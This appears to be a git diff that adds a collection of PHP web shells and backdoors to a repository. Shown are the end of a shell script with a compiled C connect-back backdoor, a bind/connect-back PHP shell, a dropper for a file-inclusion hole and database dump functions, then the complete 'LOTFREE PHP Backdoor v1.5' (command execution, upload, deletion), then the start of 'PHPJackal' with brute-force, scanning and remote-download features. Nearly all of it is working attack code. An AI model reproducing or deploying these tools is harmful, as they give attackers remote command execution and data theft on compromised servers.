+             "  char msg[ ] = \"Welcome to Data Cha0s Connect Back Shell\\n\\n\"\n" .
+             "                \"Issue \\\"export TERM=xterm; exec bash -i\\\"\\n\"\n" .
+             "                \"For More Reliable Shell.\\n\"\n" .
+             "                \"Issue \\\"unset HISTFILE; unset SAVEHIST\\\"\\n\"\n" .
+             "                \"For Not Getting Logged.\\n(;\\n\\n\";\n" .
+             "  printf(\"Data Cha0s Connect Back Backdoor\\n\\n\");\n" .
+             "  if (argc < 2 || argc > 3) {\n" .
+             "    printf(\"Usage: %s [Host] <port>\\n\", argv[0]);\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  printf(\"[*] Dumping Arguments\\n\");\n" .
+             "  l = strlen(argv[1]);\n" .
+             "  if (l <= 0) {\n" .
+             "    printf(\"[-] Invalid Host Name\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  if (!(host = (char *) malloc(l))) {\n" .
+             "    printf(\"[-] Unable to Allocate Memory\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  strncpy(host, argv[1], l);\n" .
+             "  if (argc == 3) {\n" .
+             "    port = atoi(argv[2]);\n" .
+             "    if (port <= 0 || port > 65535) {\n" .
+             "      printf(\"[-] Invalid Port Number\\n\");\n" .
+             "      return 1;\n" .
+             "    }\n" .
+             "  }\n" .
+             "  printf(\"[*] Resolving Host Name\\n\");\n" .
+             "  he = gethostbyname(host);\n" .
+             "  if (he) {\n" .
+             "    memcpy(&ia.s_addr, he->h_addr, 4);\n" .
+             "  } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {\n" .
+             "    printf(\"[-] Unable to Resolve: %s\\n\", host);\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  sin.sin_family = PF_INET;\n" .
+             "  sin.sin_addr.s_addr = ia.s_addr;\n" .
+             "  sin.sin_port = htons(port);\n" .
+             "  printf(\"[*] Connecting...\\n\");\n" .
+             "  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {\n" .
+             "    printf(\"[-] Socket Error\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {\n" .
+             "    printf(\"[-] Unable to Connect\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  printf(\"[*] Spawning Shell\\n\");\n" .
+             "  f = fork( );\n" .
+             "  if (f < 0) {\n" .
+             "    printf(\"[-] Unable to Fork\\n\");\n" .
+             "    return 1;\n" .
+             "  } else if (!f) {\n" .
+             "    write(sock, msg, sizeof(msg));\n" .
+             "    dup2(sock, 0);\n" .
+             "    dup2(sock, 1);\n" .
+             "    dup2(sock, 2);\n" .
+             "    execl(\"/bin/sh\", \"shell\", NULL);\n" .
+             "    close(sock);\n" .
+             "    return 0;\n" .
+             "  }\n" .
+             "  printf(\"[*] Detached\\n\\n\");\n" .
+             "  return 0;\n" .
+             "}\n";
+    $fbname = $tmp_dir . "/cbs";
+	$fp = fopen($fbname . ".c", "w");
+	$write = fwrite($fp, $shell);
+	fclose($fp);
+	if(!empty($write)) {
+		$command = $compiler . " -o " . $fbname . " " . $fbname . ".c";
+		$execM = test_cmd_shell();
+		if($execM > 0) {
+			$rtval = Mexec($command, $execM);
+			$command = $fbname . " " . $host . " " . $port;
+			$rtval .= Mexec($command, $execM);
+			return "<pre>" . $rtval . "</pre>";
+		} else {
+			return "<b>ERROR! No EXEC Avilable!</b>";
+		}
+		
+	} else {
+		return "<b>ERROR! Writing data!</b>";
+	}
+}
+
+######################################################################
+# drop mini inc hole
+######################################################################
+function dropminiinc($location) {
+	$Scode = "<?php\n".
+		"if (phpversion() <= '4.1.0') \$vars = array_merge(\$HTTP_GET_VARS, \$HTTP_POST_VARS);\n".
+		"else \$vars = \$_REQUEST;\n".
+		"include(\$vars[inc]);\n".
+		"?>\n";
+	$fp = fopen($location, "w");
+	$write = fwrite($fp, $Scode);
+	if(!empty($write)) return "<b>$location</b> copied\n";
+	else return "<b>ERROR! Not copied!</b>";
+}
+
+######################################################################
+# db functions
+# unchanged from dans code
+######################################################################
+function prep_rows($myresult) {
+	$dataout = "<table>\n";
+	$num_fields = mysql_num_fields($myresult);
+	$dataout .= "<tr border=1>\n";
+	for($i=0; $i<$num_fields; $i++) $dataout .= "<td>" . mysql_field_name($myresult, $i) . "</td>";
+	$dataout .= "</tr>\n";
+	while ($line = mysql_fetch_array($myresult, MYSQL_ASSOC)) {
+		$dataout .= "<tr>\n";
+		foreach($line as $colvalue) {
+			$dataout .= "<td>$colvalue</td>\n";
+		}
+	$dataout .= "</tr>\n";
+	}
+	$dataout .= "</table>\n";
+	return $dataout;
+}
+
+function dump_rows($myhost, $myuser, $mypass, $mydb, $mytable, $mydump) {
+	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
+	mysql_select_db($mydb); //  or return "Could not select database";
+	$query = "SELECT * FROM ".$mytable." INTO OUTFILE \"".$mydump."\";";
+	$result = mysql_query($query); // or return "Query failed: ".mysql_error();
+	mysql_free_result($result);
+	mysql_close($link);
+	return "Hopefully dumped!";
+}
+
+function dump_query($myhost, $myuser, $mypass, $mydb, $mysql, $mydump) {
+	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
+	mysql_select_db($mydb); //  or return "Could not select database";
+	$query = $mysql." INTO OUTFILE \"".$mydump."\";";
+	$result = mysql_query($query); // or return "Query failed: ".mysql_error();
+	mysql_free_result($result);
+	mysql_close($link);
+	return "Hopefully dumped!";
+}
+
+function display_query($myhost, $myuser, $mypass, $mydb, $mysql) {
+	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
+	mysql_select_db($mydb); //  or return "Could not select database";
+	$query = $mysql;
+	$result = mysql_query($query); // or return "Query failed: ".mysql_error();
+	$dataouted = prep_rows($result);
+	mysql_free_result($result);
+	mysql_close($link);
+	return($dataouted);
+}
+
+function display_rows($myhost, $myuser, $mypass, $mydb, $mytable) {
+	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
+	mysql_select_db($mydb); //  or return "Could not select database";
+	$query = "SELECT * FROM ".$mytable;
+	$result = mysql_query($query); // or return "Query failed: ".mysql_error();
+	$dataouted = prep_rows($result);
+	mysql_free_result($result);
+	mysql_close($link);
+	return($dataouted);
+}
+
+function display_tables($myhost, $myuser, $mypass, $mydb) {
+	global $MyLoc,$SREQ;
+	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
+	$result = mysql_list_tables($mydb);
+	if (!$result) {
+		return "DB Error, could not list tables";
+	}
+	$dataout = "<table>\n";
+	while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
+		$dataout .= "<tr>\n";
+		foreach ($line as $col_value) {
+			$dataout .= "<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incdbpass=$mypass&incdbname=$mydb&incdbtable=$col_value'>$col_value</a></td>\n";
+		}
+	$dataout .= "</tr>\n";
+	}
+	$dataout .= "</table>\n";
+	mysql_free_result($result);
+	mysql_close($link);
+	return($dataout);
+}
+
+function display_dbs($myhost, $myuser, $mypass) {
+	global $MyLoc,$SREQ;
+	$link = mysql_connect($myhost, $myuser, $mypass);
+	$result = mysql_list_dbs($link);
+	if (!$result) {
+		return "DB Error, could not list databases";
+	}
+	$dataout = "<table>\n";
+	while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
+		$dataout .= "<tr>\n";
+		foreach ($line as $col_value) {
+			$dataout .= "<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incdbpass=$mypass&incdbname=$col_value'>$col_value</a></td>\n";
+		}
+	$dataout .= "</tr>\n";
+	}
+	$dataout .= "</table>\n";
+	mysql_free_result($result);
+	mysql_close($link);
+	return($dataout);
+}
+
+function Odisplay_rows($myhost, $myuser, $mypass, $mydb, $mytable) {
+	$link = odbc_connect($myhost, $myuser, $mypass); // or return "Could not connect";
+	$query = "SELECT * FROM ".$mytable;
+	$result = odbc_exec($link, $query); // or return "Query failed: ".mysql_error();
+	$dataout = "<table>\n";
+	while ($line = odbc_fetch_row($result, MYSQL_ASSOC)) {
+		$dataout = $dataout . "<tr>\n";
+		foreach($line as $colvalue) {
+			$dataout = $dataout . "<td>$colvalue</td>\n";
+		}
+	$dataout = $dataout . "</tr>\n";
+	}
+	$dataout = $dataout . "</table>\n";
+	return($dataout);
+}
+
+function Odisplay_tables($myhost, $myuser, $mypass) {
+	$link = odbc_connect($myhost, $myuser, $mypass); // or return "Could not connect";
+	$result = odbc_tables($link);
+	if (!$result) {
+		return "DB Error, could not list tables";
+	}
+	$dataout = "<table>\n";
+	while ($line = odbc_fetch_row($result, MYSQL_ASSOC)) {
+		if(odbc_result($line, 4) == "TABLE") {
+			$dataout = $dataout . "<tr>\n";
+			$dataout = $dataout . "<td>" . odbc_result($tablelist, 3) ."</td>\n"; 
+		}
+		$dataout = $dataout . "</tr>\n";
+	}
+	$dataout = $dataout . "</table>\n";
+	return($dataout);
+}
+
+######################################################################
+# Dan's Network function Wrappers
+# Initial use inside this script, need to handle the error data 
+# differently to get it included in the base 64 output!
+######################################################################
+
+function DB_NET_GET_SOCKET_PROTOCOL($prot) {
+	switch($prot) {
+		case "udp":
+			$protocol = SOL_UDP;
+			$socktype = SOCK_DGRAM;
+		break;
+		case "tcp":
+		default:
+			$protocol = SOL_TCP;
+			$socktype = SOCK_STREAM;
+		break;
+	}
+	return(array($protocol, $socktype));
+}
+
+function DB_NET_CONNECT($hostname, $port=80, $prot="tcp") {
+	$address = gethostbyname($hostname);
+	list($protocol, $socktype) = DB_NET_GET_SOCKET_PROTOCOL($prot);
+	switch($prot) {
+		case "udp":
+			$protocol = SOL_UDP;
+			$socktype = SOCK_DGRAM;
+		break;
+		case "tcp":
+		default:
+			$protocol = SOL_TCP;
+			$socktype = SOCK_STREAM;
+		break;
+	}
+	$socket = socket_create(AF_INET, $socktype, $protocol);
+	if ($socket < 0) {
+		echo "socket_create() failed: reason: " . socket_strerror($socket) . "\n";
+	}
+
+	$result = socket_connect($socket, $address, $port);
+	if ($result < 0) {
+		echo "socket_connect() failed.\nReason: ($result) " . socket_strerror($result) . "\n";
+	}
+	return $socket;
+}
+
+function DB_NET_LISTEN($address, $port) {
+	if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0) {
+		echo "socket_create() failed: reason: " . socket_strerror($sock) . "\n";
+		return(-1);
+	}
+
+	if (($ret = socket_bind($sock, $address, $port)) < 0) {
+		echo "socket_bind() failed: reason: " . socket_strerror($ret) . "\n";
+		return(-2);
+	}
+
+	if (($ret = socket_listen($sock, 5)) < 0) {
+		echo "socket_listen() failed: reason: " . socket_strerror($ret) . "\n";
+		return(-3);
+	}
+
+	return($sock);
+}
+
+######################################################################
+# Dan's PHP Connect Back / Port Binding Shell!
+# Yes that right a REAL shell!
+# Now I had this idea for ages, finally coded it 6 months ago, and 
+# it's never really been used.
+# Not really brain science but when there are many examples of PHP 
+# sockets + proc_open it's a little harder.
+######################################################################
+
+function DB_Shell($type, $shell, $port, $host = "0.0.0.0") {
+	if($type == "cb" && $host != "0.0.0.0") {
+		$procsock = DB_NET_CONNECT($host, $port, "tcp");
+	} elseif ($type == "pb") {
+		$lsock = DB_NET_LISTEN($host, $port);
+		if (($procsock = socket_accept($lsock)) < 0) {
+    		return "socket_accept() failed: reason: " . socket_strerror($procsock) . "\n";
+    	}
+	} else {
+		return "Error no connection details specified!";
+	}
+
+	set_time_limit(9000);
+	$descriptorspec = array(
+		0 => array("pipe", "r"),
+		1 => array("pipe", "w"),
+		2 => array("pipe", "w")
+	);
+	$process = proc_open($shell, $descriptorspec, $pipes);
+	if (is_resource($process)) {
+		$tmp_loop = 1;
+		do {
+			$tmp_array = array($procsock);
+			$num_changed_sockets = socket_select($tmp_array, $write = NULL, $except = NULL, 0);
+			if ($num_changed_sockets === false) {
+				$tmp_loop = 0;
+			} else if ($num_changed_sockets > 0) {
+				foreach($tmp_array as $k => $v) {
+					if($v == $procsock) {
+						if(socket_last_error($procsock) > 0) $tmp_loop = 0;
+						if($tmp_loop == 1 && false == ($buf = socket_read($procsock, 2048, PHP_NORMAL_READ))) $tmp_loop = 0;
+						fwrite($pipes[0], $buf);
+					}
+				}
+			}
+			$tmp_arrayS = array($pipes[1], $pipes[2]);
+			$num_changed_streams = stream_select($tmp_arrayS, $write = NULL, $except = NULL, 0);
+			if ($num_changed_streams === FALSE) {
+				$tmp_loop = 0;
+			} else if ($num_changed_streams > 0) {
+				foreach($tmp_arrayS as $k => $v) {
+					if($tmp_loop == 1 && false == ($buf = fread($v, 2048))) $tmp_loop = 0;
+					socket_write($procsock, $buf, strlen($buf));
+				}
+			}
+		} while($tmp_loop == 1);
+	} else {
+		return "Error executing shell " . $shell;
+	}
+}
+
+?>
diff --git a/138shell/P/phpbackdoor15.txt b/138shell/P/phpbackdoor15.txt
new file mode 100644
index 0000000..06f2321
--- /dev/null
+++ b/138shell/P/phpbackdoor15.txt
@@ -0,0 +1,133 @@
+<?php
+function good_link($link)
+{
+  $link=ereg_replace("/+","/",$link);
+  $link=ereg_replace("/[^/(..)]+/\.\.","/",$link);
+  $link=ereg_replace("/+","/",$link);
+  if(!strncmp($link,"./",2) && strlen($link)>2)$link=substr($link,2);
+  if($link=="")$link=".";
+  return $link;
+}
+
+$dir=isset($_REQUEST['dir'])?$_REQUEST['dir']:".";
+$dir=good_link($dir);
+$rep=opendir($dir);
+chdir($dir);
+
+if(isset($_REQUEST["down"]) && $_REQUEST["down"]!="")
+{
+  header("Content-Type: application/octet-stream");
+  header("Content-Length: ".filesize($_REQUEST["down"]));
+  header("Content-Disposition: attachment; filename=".basename($_REQUEST["down"]));
+  readfile($_REQUEST["down"]);
+  exit();
+}
+?>
+<html>
+<head><title>LOTFREE PHP Backdoor v1.5</title></head>
+<body>
+<br>
+<?php
+  echo "Actuellement dans <b>".getcwd()."</b><br>\n";
+  echo "<b>dir = '$dir'</b><br>\n";
+  echo "Cliquez sur un nom de fichier pour lancer son telechargement. Cliquez sur une croix pour effacer un fichier !<br><br>\n";
+ 
+  if(isset($_REQUEST['cmd']) && $_REQUEST['cmd']!="")
+  {
+    echo "<pre>\n";
+    system($_REQUEST['cmd']);
+    echo "</pre>\n";
+  }
+
+  if(isset($_FILES["fic"]["name"]) && isset($_POST["MAX_FILE_SIZE"]))
+  {
+    if($_FILES["fic"]["size"]<$_POST["MAX_FILE_SIZE"])
+    {
+      if(move_uploaded_file($_FILES["fic"]["tmp_name"],good_link("./".$_FILES["fic"]["name"])))
+      {
+        echo "fichier telecharge dans ".good_link("./".$_FILES["fic"]["name"])."!<br>\n";
+      }
+      else echo "upload failed: ".$_FILES["fic"]["error"]."<br>\n";
+    }
+    else echo "fichier trop gros!<br>\n";
+  }
+
+  if(isset($_REQUEST['rm']) && $_REQUEST['rm']!="")
+  {
+    if(unlink($_REQUEST['rm']))echo "fichier ".$_REQUEST['rm']." efface !<br>\n";
+    else echo "Impossible de supprimer le fichier<br>\n";
+  }
+
+?>
+<hr>
+<table align="center" width="95%" border="0" cellspacing="0" bgcolor="lightblue">
+<?php
+  $t_dir=array();
+  $t_file=array();
+  $i_dir=0;
+  $i_file=0;
+  while($x=readdir($rep))
+  {
+    if(is_dir($x))$t_dir[$i_dir++]=$x;
+    else $t_file[$i_file++]=$x;
+  }
+  closedir($rep);
+  while(1)
+  {
+?>
+<tr>
+  <td width="20%" bgcolor="lightgray" valign="top">
+<?php
+    if($x=each($t_dir))
+    {
+      $name=$x["value"];
+      if($name=='.'){}
+      elseif($name=='..') echo "    <a href='".$_SERVER['PHP_SELF']."?dir=".good_link("$dir/../")."'>UP</a><br><br>\n";
+      else echo "    <a href='".$_SERVER['PHP_SELF']."?dir=".good_link("$dir/$name")."'>".$name."</a>\n";
+    }
+?>
+  </td>
+  <td width='78%'<?php
+    if($y=each($t_file))
+    {
+      if($y["key"]%2==0)echo " bgcolor='lightgreen'>\n";
+      else echo ">\n";
+      echo "    <a href='".$_SERVER['PHP_SELF']."?dir=$dir&down=".$y["value"]."'>".$y["value"]."</a>\n";
+    }
+    else echo ">\n";
+?>
+  </td>
+  <td valign='center' width='2%'<?php
+    if($y)
+    {
+      if($y["key"]%2==0)echo " bgcolor='lightgreen'";
+      echo "><a href='".$_SERVER['PHP_SELF']."?dir=$dir&rm=".$y["value"]."'><b>X</b></a>";
+    }
+    else echo ">\n";
+?></td>
+</tr>
+<?php
+    if(!$x && !$y)break;
+  }
+?>
+</table>
+<hr>
+<br>
+<a href="<?php echo $_SERVER['PHP_SELF']; ?>?dir=">revenir au repertoire d'origine</a><br><br>
+<form method="post" action="<?php echo $_SERVER['PHP_SELF']."?dir=$dir"; ?>">
+Executer une commande <input type="text" name="cmd"> <input type="submit" value="g0!">
+</form><br>
+Uploader un fichier dans le repertoire courant :<br>
+<form enctype="multipart/form-data" method="post" action="<?php echo $_SERVER['PHP_SELF']."?dir=$dir"; ?>">
+<input type="file" name="fic"><input type="hidden" name="MAX_FILE_SIZE" value="100000">
+<input type="submit" value="upl0ad!"></form><br>
+<br>
+<center>
+PHP Backdoor Version 1.5<br>
+by sirius_black / LOTFREE TEAM<br>
+Execute commands, browse the filesystem<br>
+Upload, download and delete files...<br>
+<a href="http://www.lsdp.net/~lotfree">http://www.lsdp.net/~lotfree</a><br>
+</center>
+</body>
+</html>
\ No newline at end of file
diff --git a/138shell/P/phpjackal.txt b/138shell/P/phpjackal.txt
new file mode 100644
index 0000000..9b3a1ac
--- /dev/null
+++ b/138shell/P/phpjackal.txt
@@ -0,0 +1,1413 @@
+<?php
+#--Config--#
+$login_password= ''; //Set password
+#----------#
+error_reporting(E_ALL);
+set_time_limit(0);
+ini_set("max_execution_time","0");
+ini_set("memory_limit","9999M");
+set_magic_quotes_runtime(0);
+if(!isset($_SERVER))$_SERVER = &$HTTP_SERVER_VARS;
+if(!isset($_POST))$_POST = &$HTTP_POST_VARS;
+if(!isset($_GET))$_GET = &$HTTP_GET_VARS;
+if(!isset($_COOKIE))$_COOKIE=$HTTP_COOKIE_VARS;
+$_REQUEST = array_merge($_GET, $_POST);
+if (get_magic_quotes_gpc()){
+foreach ($_REQUEST as $key=>$value)
+{
+$_REQUEST[$key]=stripslashes($value);
+}
+}
+function hlinK($str=""){
+$myvars=array('workingdiR','urL','imagE','namE','filE','downloaD','seC','cP','mV','rN','deL');
+$ret=$_SERVER['PHP_SELF']."?";
+$new=explode("&",$str);
+foreach ($_GET as $key => $v){
+$add=1;
+foreach($new as $m){
+$el = explode("=", $m);
+if ($el[0]==$key)$add=0;
+}
+if($add)if(!in_array($key,$myvars))$ret.=$key."=".$v."&";
+}
+$ret.=$str;
+return $ret;
+}
+if(!empty($login_password)){
+if(!empty($_REQUEST['fpassw'])){
+if($_REQUEST['fpassw']==$login_password)setcookie('passw',md5($_REQUEST['fpassw']));
+@header("Location: ".hlinK());
+}
+if(empty($_COOKIE['passw']) || $_COOKIE['passw']!=md5($login_password))die("<html><body><table><form method=post><tr><td>Password:</td><td><input type=hidden name=seC value=about><input type=password name=fpassw></td></tr><tr><td></td><td><input type=submit value=login></td></tr></form></table></body></html>");
+}
+if (!empty($_REQUEST['workingdiR'])) chdir($_REQUEST['workingdiR']);
+function checkthisporT($ip,$port,$timeout,$type=0){
+if(!$type){
+$scan=@fsockopen($ip,$port,$n,$s,$timeout);
+if($scan){fclose($scan);return 1;}
+}
+elseif(function_exists('socket_set_timeout')){
+$scan=@fsockopen("udp://".$ip,$port);
+if($scan){
+socket_set_timeout($scan,$timeout);
+@fwrite($scan,"\x00");
+$s=time();
+fread($scan,1);
+if((time()-$s)>=$timeout){fclose($scan);return 1;}
+}
+}
+return 0;
+}
+if (!function_exists("file_get_contents")){
+function file_get_contents($addr){
+$a = fopen($addr,"r");
+$tmp = fread($a,filesize($a));
+fclose($a);
+if($a)return $tmp;
+}
+}
+if (!function_exists("file_put_contents")){
+function file_put_contents($addr,$con){
+$a = fopen($addr,"w");
+if(!$a)return 0;
+fwrite($a,$con);
+fclose($a);
+return strlen($con);
+}
+}
+function flusheR(){
+flush();@ob_flush();
+}
+if (!empty($_REQUEST['downloaD'])){
+@ob_clean();
+$dl=$_REQUEST['downloaD'];
+$con=file_get_contents($dl);
+header("Content-type: application/octet-stream");
+header("Content-disposition: attachment; filename=\"$dl\";");
+header("Content-length: ".strlen($con));
+echo $con;
+exit;
+}
+if (!empty($_REQUEST['imagE'])){
+$img=$_REQUEST['imagE'];
+header("Content-type: imagE/gif");
+header("Content-length: ".filesize($img));
+header("Last-Modified: ".date("r",filemtime($img)));
+echo file_get_contents($img);
+exit;
+}
+@header("Cache-Control: no-cache, must-revalidate");
+@header("Expires: Mon, 7 Aug 1987 05:00:00 GMT");
+function showsizE($size){
+if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB";
+elseif ($size>=1048576)$size = round(($size/1048576),2)." MB";
+elseif ($size>=1024)$size = round(($size/1024),2)." KB";
+else $size .= " B";
+return $size;
+}
+if (substr((strtoupper(php_unamE())),0,3)=="WIN") $windows=1; else $windows=0;
+$errorbox = "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td><b>Error: </b>";
+$et = "</td></tr></table>";
+$v="1.5";
+$msgbox="<br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td align=\"center\">";
+$intro="<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\"><tr><td bgcolor=\"#666666\"><b>Script:</b><br>".str_repeat("-=-",25)."<br><b>Name:</b> PHPJackal<br><b>Version:</b> $v<br><br><b>Author:</b><br>".str_repeat("-=-",25)."<br><b>Name:</b> NetJackal<br><b>Country:</b> Iran<br><b>Website:</b> <a href=\"http://netjackal.by.ru\" target=\"_blank\">http://netjackal.by.ru</a><br><b>Email:</b> <a href=\"mailto:nima_501@yahoo.com?subject=PHPJackal\">nima_501@yahoo.com</a><br></font>$et</center>";
+$footer="${msgbox}PHPJackal v$v - Powered By <a href=\"http://netjackal.by.ru\" target=\"_blank\">NetJackal</a>$et";
+$hcwd="<input type=hidden name=workingdiR value=\"".getcwd()."\">";
+$t = "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#333333\">";
+$crack="</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\" name=form><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>";
+function namE(){
+$name='';
+srand((double)microtime()*100000);
+for ($i=0;$i<=rand(3,10);$i++){
+$name.=chr(rand(97,122));
+}
+return $name;
+}
+function whereistmP(){
+$uploadtmp=ini_get('upload_tmp_dir');
+$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
+if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
+if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
+if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
+if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
+if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
+return ".";
+}
+function shelL($command){
+global $windows,$disablefunctions;
+$exec = '';$output= '';
+$dep[]=array('pipe','r');$dep[]=array('pipe','w');
+if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();}
+elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; }
+elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("\n",$output);$exec= $output;}
+elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);}
+elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);}
+elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);}
+elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);}
+return $exec;
+}
+function downloadiT($get,$put){
+$fo=@strtolower(ini_get('allow_url_fopen'));
+if($fo || $fo=='on')$con=file_get_contents($get);
+else{
+$u=parse_url($get);
+$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
+$url=fsockopen($host, 80, $en, $es, 12);
+fputs($url, "GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");
+$tmp=$con='';
+while($tmp!="\r\n")$tmp=fgets($url);
+while(!feof($url))$con.=fgets($url);
+}
+$mk=file_put_contents($put,$con);
+if($mk)return 1;
+return 0;
+}
+function smtplogiN($addr,$user,$pass,$timeout){
+$sock=fsockopen($addr,25,$n,$s,$timeout);
+if(!$sock)return -1;
+fread($sock,1024);
+fputs($sock,'ehlo '.namE()."\r\n");
+$res=substr(fgets($sock,512),0,1);
+if($res!='2')return 0;
+fgets($sock,512);fgets($sock,512);fgets($sock,512);
+fputs($sock,"AUTH LOGIN\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='334')return 0;
+fputs($sock,base64_encode($user)."\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='334')return 0;
+fputs($sock,base64_encode($pass)."\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='235')return 0;
+return 1;
+}
+function checksmtP($host,$timeout){
+$from=strtolower(namE())."@".strtolower(namE()).".com";
+$sock=@fsockopen($host,25,$n,$s,$timeout);
+if(!$sock)return -1;
+$res=substr(fgets($sock,512),0,3);
+if($res!='220')return 0;
+fputs($sock,'HELO '.namE()."\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='250')return 0;
+fputs($sock,"MAIL FROM: <$from>\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='250')return 0;
+fputs($sock,"RCPT TO: <contact@persianblog.com>\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='250')return 0;
+fputs($sock,"DATA\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='354')return 0;
+fputs($sock,"From: ".namE()." ".namE()." <$from>\r\nSubject: ".namE()."\r\nMIME-Version: 1.0\r\nContent-Type: text/plain;\r\n\r\n".namE().namE().namE()."\r\n.\r\n");
+$res=substr(fgets($sock,512),0,3);
+if($res!='250')return 0;
+return 1;
+}
+function check_urL($url,$method,$search,$timeout){
+if(empty($search))$search='200';
+$u=parse_url($url);
+$method=strtoupper($method);
+$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
+$data=(!empty($u['query']))?$u['query']:'';
+if(!empty($data))$data="?$data";
+$sock=@fsockopen($host,80,$en,$es,$timeout);
+if($sock){
+fputs($sock,"$method $file$data HTTP/1.0\r\n");
+fputs($sock,"Host: $host\r\n");
+if($method=='GET')fputs($sock,"\r\n");
+elseif($method='POST')fputs($sock,"Content-Type: application/x-www-form-urlencoded\r\nContent-length: ".strlen($data)."\r\nAccept-Encoding: text\r\nConnection: close\r\n\r\n$data");
+else return 0;
+if($search=='200')if(substr(fgets($sock),0,3)=="200"){fclose($sock);return 1;}else {fclose($sock);return 0;}
+while(!feof($sock)){
+$res=trim(fgets($sock));
+if(!empty($res))if(strstr($res,$search)){fclose($sock);return 1;}
+}
+fclose($sock);
+}
+return 0;
+}
+function get_sw_namE($host,$timeout){
+$sock=@fsockopen($host,80,$en,$es,$timeout);
+if($sock){
+$page=namE().namE();
+fputs($sock,"GET /$page HTTP/1.0\r\n\r\n");
+while(!feof($sock)){
+$con=fgets($sock);
+if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;}
+}
+fclose($sock);
+return -1;
+}return 0;
+}
+function snmpchecK($ip,$com,$timeout){
+$res=0;
+$n=chr(0x00);
+$packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01). chr(0x00). chr(0x04). chr(strlen($com)). 
+$com. chr(0xA0). 
+chr(0x19). chr(0x02). chr(0x01). chr(0x01). chr(0x02). chr(0x01). $n.
+chr(0x02). chr(0x01). $n. chr(0x30). chr(0x0E). chr(0x30). chr(0x0C).
+chr(0x06). chr(0x08). chr(0x2B). chr(0x06). chr(0x01). chr(0x02). chr(0x01).
+chr(0x01). chr(0x01). $n. chr(0x05). $n;
